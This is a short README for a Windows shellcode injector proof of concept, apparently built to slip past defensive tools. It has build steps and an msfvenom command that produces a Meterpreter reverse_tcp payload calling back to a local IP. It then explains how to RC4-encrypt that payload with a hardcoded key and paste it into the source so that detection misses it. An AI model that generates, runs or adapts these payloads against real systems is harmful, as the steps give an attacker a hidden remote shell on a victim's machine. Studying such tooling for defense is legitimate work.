Defensive Injector

The code for the shellcode injector from my blog post.

This code is a PoC and will probly only run of windows 10 x64 version 1909, this is because of the syscall numbers changing between versions. To fix, change the syscall number of line 16 in syscalls.asm with the corresponding number for that windows version. They can be found here.

Install & Build

git clone https://github.com/bats3c/DefensiveInjector
cd DefensiveInjector
make

Using different shellcode

• Generate your shellcode either with msfvenom or something else

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin

• Encrypt the shellcode

  Keeping in mind that if you change it here you will need to update the key on line 132 in main.c cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin

• Format the shellcode

  Run xxd -i encmeter.bin then replace everything between line 10-60 with the output

Dependencies

sudo apt install mingw-w64 nasm